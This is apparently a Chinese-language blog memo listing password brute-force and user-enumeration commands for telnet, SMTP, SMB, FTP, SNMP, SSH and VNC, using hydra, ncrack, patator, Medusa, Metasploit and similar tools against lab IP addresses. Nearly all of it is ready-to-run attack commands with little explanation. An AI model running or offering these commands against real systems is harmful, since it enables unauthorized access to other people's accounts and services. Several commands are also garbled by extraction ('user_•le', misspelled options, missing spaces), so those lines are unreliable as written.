hydra、ncrack、patator、Metasploit 和 Medusa，爆破：telnet、SMTP、SMB、FTP、

本文對常見的系統服務的認證系統進行攻擊嘗試的方式做了彙總，使用到的工具主要包括 hydra、ncrack、patator、Metasploit 和 Medusa，這些工具預設在 kali 上已經安裝，可以直接使用，本文主要涉及的服務包括：telnet、SMTP、SMB、FTP、SNMP、SSH、VNC，關于工具的介紹和服務的介紹未進行講解，需自行查閱資料進行了解。

telnet

hydra

hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 telnet

-L

 指定使用者名清單

-P

 指定密碼清單

Ncrack

ncrack –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23

-U

 指定使用者名清單

-P

 指定密碼清單

Patator

patator telnet_login host=192.168.1.106 inputs=‘FILE0\nFILE1’ 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re=‘Username: | Password:’

Metasploit

use auxiliary/scanner/telnet/telnet_login              msf exploit (telnet_login)>set rhosts 192.168.1.106 (IP of Remote Host)              msf exploit (telnet_login)>set user_•le /root/Desktop/user txt              msf exploit (telnet_login)>set pass_•le /root/Desktop/pass.txt              msf exploit (telnet_login)>set stop_on_success true              msf exploit (telnet_login)> exploit
           

SMTP 

telent

連接配接 25 端口：

telnet 192.168.1.107 25

枚舉使用者，結果傳回 550 則表示使用者不存在，結果傳回 250，251，252 表示使用者是有效的：

vrfy [email protected]

Metasploit

use auxiliary/scanner/smtp/smtp_enum              msf auxiliary(smtp_enum) > set rhosts 192.168.1.107              msf auxiliary(smtp_enum) > set rport 25              msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt              msf auxiliary(smtp_enum) > exploit
           

smtp-user-enum

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M

 指定使用哪種方式枚舉，比如 EXPN, VRFY 或 RCPT

-U

 指定使用者名清單

-t

 指定目标主機 IP

指定郵箱字尾，使用者名清單隻需要名字即可，使用參數 

-D

:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

iSMTP

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

SMB

Hydra

hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb

Ncrack

ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445

Medusa

medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt

Metasploit​​​​​​​

use auxiliary/scanner/smb/smb_login              msf exploit (smb_login)>set rhost 192.168.1.118              msf exploit (smb_login)>set user_•le /root/Desktop/user.txt              msf exploit (smb_login)>set pass_•le /root/Desktop/pass.txt              msf exploit (smb_login)>set stop_on_success true              msf exploit (smb_login)>exploit
           

FTP 

Hydra

hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

Ncrack

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Medusa

Medusa -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Patator

patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

Metasploit

use auxiliary/scanner/ftp/ftp_login
         msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)msf exploit (ftp_login)>set user_•le /root/Desktop/user.txt              msf exploit (ftp_login)>set userpass_•le /root/Desktop/pass.txt              msf exploit (ftp_login)>set stop_on_success true              msf exploit (ftp_login)> exploit
           

SNMP 

Hydra

hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

Medusa

medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt

Metasploit

use auxiliary/scanner/snmp/snmp_login              msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)              msf auxiliary(scanner/snmp/snmp_login)> set pass_•le /root/Desktop/pass.txt              msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true               msf auxiliary(scanner/snmp/snmp_login)> run
           

Nmap

nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp- brute.communitiesdb=/root/Desktop/pass.txt

Onesixtyone

onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt

SSH

Hydra

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ssh

Medusa

medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh

Ncrack

ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103:22

Patator

patator ssh_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

Metasploit

use auxiliary/scanner/ssh/ssh_login              msf exploit (ssh_login)>set rhosts 192.168.1.103 (IP of Remote Host)              msf exploit (ssh_login)>set user_•le /root/Desktop/user.txt              msf exploit (ssh_login)>set pass_•le /root/Desktop/pass.txt              msf exploit (ssh_login)>exploit
           

VNC

Hydra

Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

Metasploit

use auxiliary/scanner/vnc/vnc_login              msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6              msf auxiliary(scanner/vnc/vnc_login) > set pass_•le /root/Desktop/pass.txt              msf auxiliary(scanner/vnc/vnc_login) > run
           

Patator

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

Medusa

Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

Ncrack

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900

總結

整體來看，這些工具可以對除了以上幾種服務攻擊之外，還可以對其他更多的服務進行攻擊嘗試，比如資料庫服務中的 mssql、mysql、oracle 等，差異僅僅在于參數不同，這裡主要做個備忘，以備不時之需，沒啥技術含量，僅供參考。